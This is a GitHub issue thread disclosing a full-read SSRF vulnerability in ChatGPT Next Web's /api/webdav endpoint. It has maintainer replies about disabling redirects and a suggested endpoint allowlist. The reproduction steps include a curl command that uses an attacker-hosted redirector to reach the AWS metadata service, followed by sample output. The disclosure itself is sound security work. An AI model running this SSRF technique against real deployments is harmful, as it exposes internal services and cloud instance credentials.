Comments (8)
We will solve this problem by whitelisting webdav endpoints
from chatgpt-next-web.
Bug Description
The v2.11.3 release removed the /api/cors endpoint but added a new /api/webdav endpoint. This new endpoint is also vulnerable to full-read SSRF.
Steps to Reproduce
Let's call the attacker IP "attacker-ip", and the vulnerable ChatGPT Next Web target ip "target-ip".
An attacker would first set up a http redirector on their IP. This redirector will respond to HTTP requests by returning a HTTP redirect with the Location header set to an endpoint in the internal network of the "target-ip".
For instance, let's say the redirector is running on port 46732 on the "attacker-ip" and it's set up to redirect to http://169.254.169.254/latest/meta-data (AWS metadata service).
Then the attacker makes a request to the webdav endpoint that looks like this:
curl --path-as-is 'http://target-ip:3000/api/webdav/a:/chatgpt-next-web/backup.json?endpoint=http://<attacker-ip>:46732'
The /api/webdav handler will fetch "http://attacker-ip:46732/a:/chatgpt-next-web/backup.json", which will then redirect to http://169.254.169.254/latest/meta-data, resulting in the attacker getting an output like this:
ami-id ami-launch-index ami-manifest-path block-device-mapping/ events/ hibernation/ hostname iam/ identity-credentials/ instance-action instance-id instance-life-cycle instance-type local-hostname local-ipv4 mac metrics/ network/ placement/ profile public-hostname public-ipv4 public-keys/ reservation-id security-groups services/ system
Expected Behavior
the right solution is to allow the user to configure the webdav urls in server-side config, and for the application to only allow access to those URLs. Redirects could be disabled but it'd still be vulnerable to blind SSRF.
Screenshots
No response
Deployment Method
- Docker
- Vercel
- Server
Desktop OS
No response
Desktop Browser
No response
Desktop Browser Version
No response
Smartphone Device
No response
Smartphone OS
No response
Smartphone Browser
No response
Smartphone Browser Version
No response
Additional Logs
No response
does it still affected with this latest commits (unreleased) c0c54e5 ?
from chatgpt-next-web.
waiting for the info..
from chatgpt-next-web.
haven't tested the latest but from the code it appears to be affected. the attacker fully controls the endpoint the server reaches out to, and the server can be redirected back to arbitrary internal URLs.
from chatgpt-next-web.
I'll patch a separate version to disable redirect, @nvn1729 do you have any other suggestions?
from chatgpt-next-web.
merged in #4381
from chatgpt-next-web.
One approach is for the user to define an allowlist of webdav endpoints in server-side config, and the webdav API should only allow access to those specific endpoints.
Disabling redirects helps but it'll still leave the app vulnerable to blind SSRF.
from chatgpt-next-web.
from chatgpt-next-web.
Related Issues (20)
- [Bug] 面具功能中的以文搜图输出的是代码块, 并没有转化成图片 HOT 3
- ios pwa桌面图标问题 HOT 8
- [Bug] 如何使用OpenAI渠道调用Claude模型呢? HOT 5
- [Feature Request]: 希望增加一个开关可以关闭对用户输入内容的转义 HOT 2
- [Bug] Mac桌面端鼠标滑动问题 HOT 5
- [Bug] macOS APP中文输入法回车直接发送 HOT 9
- [Bug] code bypass vulnerability HOT 2
- [Feature Request]: 代理地址功能 HOT 3
- [Bug] Input Templates appear after each message HOT 2
- [Bug] 同步始终有问题,谢谢 HOT 16
- When you scroll up to a certain position and then click the mouse, it will automatically jump to the bottom.[Bug] HOT 2
- ChunkLoadError: Loading chunk 8029 failed.[Bug] HOT 3
- [Bug] openai新出的模型gpt-4-turbo-2024-04-09和gpt-4-turbo模型无法用视觉功能 HOT 3
- [Bug] Using 'yarn build' or 'npm build' causes the server to crash. HOT 3
- [Feat]Add Path var to disable the image upload function HOT 3
- [Bug] 聊天记录的快捷复制按钮自动隐藏无法点击 HOT 3
- [Bug] 使用gpt-4-turbo模型时 max_tokens设置大于4096就会报错 HOT 5
- [Bug] 自定义接口勾选取消后,接口调用仍然在使用自定义接口未使用服务中配置的baseurl HOT 5
- [Bug] issue HOT 2
- [Feature Request]: gpt-4-turbo-2024-04-09 HOT 3
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from chatgpt-next-web.